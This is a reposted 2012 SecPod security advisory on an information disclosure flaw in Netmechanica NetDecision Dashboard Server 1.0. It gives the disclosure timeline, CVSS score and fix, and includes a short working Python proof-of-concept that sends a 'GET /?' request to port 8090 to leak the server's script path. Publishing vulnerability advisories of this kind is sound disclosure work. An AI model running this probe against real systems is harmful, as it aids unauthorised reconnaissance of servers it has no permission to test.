首页
|
安全文章
|
安全工具
|
Exploits
|
本站原创
|
关于我们
|
网站地图
|
安全论坛
当前位置:
主页
>
安全文章
>
文章资料
>
Exploits
>文章内容
Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability
来源:www.secpod.com 作者:SecPod 发布时间:2012-03-01
##############################################################################
#
# Title : Netmechanica NetDecision Dashboard Server Information Disclosure
# Vulnerability
# Author : Prabhu S Angadi SecPod Technologies (
www.secpod.com
)
# Vendor :
http://www.netmechanica.com
# Advisory :
http://secpod.org/blog/?p=478
#
http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_Dashboard_Server_Info_Disc_Vuln.txt
#
http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_Dashboard_Server_Info_Disc_PoC.py
# Software : Netmechanica NetDecision Dashboard Server version 1.0
# Date : 05/12/2011
#
###############################################################################
SecPod ID: 1038 05/12/2011 Issue Discovered
21/02/2012 Vendor Notified
22/02/2012 Vendor Acknowledge
24/02/2012 Issue Resolved
Class: Information Disclosure Severity: Medium
Overview:
---------
Netmechanica NetDecision 4.5.1 Dashboard Server version 1.0 is prone to
information disclosure vulnerability.
Technical Description:
----------------------
The vulnerability is caused due to improper validation of malicious HTTP
request to Dashboard server appended with '?' character, which discloses the
Dashboard server's web script physical path.
Impact:
--------
Successful exploitation could allow an attacker to cause disclosure of
sensitive information.
Affected Software:
------------------
Netmechanica NetDecision 4.5.1 (full package) containing Dashboard Server
version 1.0
Tested on:
-----------
Netmechanica NetDecision 4.5.1 (full package) containing Dashboard Server
version 1.0 on Windows XP SP3 & Win XP2. Older versions might be affected.
References:
-----------
http://secpod.org/blog/?p=478
http://www.netmechanica.com/downloads
http://www.netmechanica.com/news/?news_id=26
http://www.netmechanica.com/netdecision_dashboard
Proof of Concept:
----------------
http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_Dashboard_Server_Info_Disc_PoC.py
Vendor URL:
----------------
http://www.netmechanica.com
http://www.netmechanica.com/news/?news_id=26
Solution:
----------
Upgrade to NetDecision 4.6.1
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Risk factor = Medium
Credits:
--------
Prabhu S Angadi of SecPod Technologies has been credited with the discovery of this
vulnerability.
#!/usr/bin/python
##############################################################################
#
# Title : Netmechanica NetDecision Dashboard Server Information Disclosure
# Vulnerability
# Author : Prabhu S Angadi SecPod Technologies (
www.secpod.com
)
# Vendor :
http://www.netmechanica.com
# Advisory :
http://secpod.org/blog/?p=478
#
http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_Dashboard_Server_Info_Disc_Vuln.txt
#
http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_Dashboard_Server_Info_Disc_PoC.py
# Software : Netmechanica NetDecision Dashboard Server version 1.0
# Date : 05/12/2011
#
###############################################################################
import socket,sys,time
if len(sys.argv) < 2:
print "\t[-] Usage: python SecPod_Netmechanica_NetDecision_Dashboard_Server_Info_Disc_PoC.py target_ip"
print "\t[-] Example : python SecPod_Netmechanica_NetDecision_Dashboard_Server_Info_Disc_PoC.py 127.0.0.1"
print "\t[-] Exiting..."
sys.exit(0)
port = 8090
target = sys.argv[1]
try:
socket.inet_aton(target)
except socket.error:
print "Invalid IP address found ..."
sys.exit(1)
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target,port))
time.sleep(1)
except:
print "socket() failed"
sys.exit(1)
exploit = "GET " + "/?" + "HTTP/1.0 "+ "\r\n\r\n"
print "HTTP GET request with '?' filename triggers the vulnerability"
data = exploit
sock.sendto(data, (target, port))
res = sock.recv(1024)
sock.close()
if res.find('file: ') != -1 :
print "[+] Full Path of the web script directory of DashBoard Server is ....\r\n"
print res.split('file: ')[1]
else:
print "[+] Did not get the source path ..."
sys.exit(1)
[
推荐
] [
评论(0条)
]
[返回顶部]
[打印本页]
[关闭窗口]
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
§最新评论:
热点文章
·
CVE-2012-0217 Intel sysret exp
·
Linux Kernel 2.6.32 Local Root
·
Array Networks vxAG / xAPV Pri
·
Novell NetIQ Privileged User M
·
Array Networks vAPV / vxAG Cod
·
Excel SLYK Format Parsing Buff
·
PhpInclude.Worm - PHP Scripts
·
Apache 2.2.0 - 2.2.11 Remote e
·
VideoScript 3.0 <= 4.0.1.50 Of
·
Yahoo! Messenger Webcam 8.1 Ac
·
Family Connections <= 1.8.2 Re
·
Joomla Component EasyBook 1.1
相关文章
·
Netmechanica NetDecision Traff
·
ImgPals Photo Host Version 1.0
·
Netmechanica NetDecision HTTP
·
Novell Groupwise Address Book
·
IBM Personal Communications I-
·
Microsoft Internet Explorer 8
·
ASUS Net4Switch ipswcom.dll Ac
·
Sysax <= 5.53 SSH Username BoF
·
Sysax Multi Server 5.53 SFTP P
·
VLC Media Player RealText Subt
·
Socusoft Photo 2 Video v8.05 -
·
DJ Studio Pro 5.1 .pls Stack B
推荐广告
CopyRight © 2002-2022
VFocuS.Net
All Rights Reserved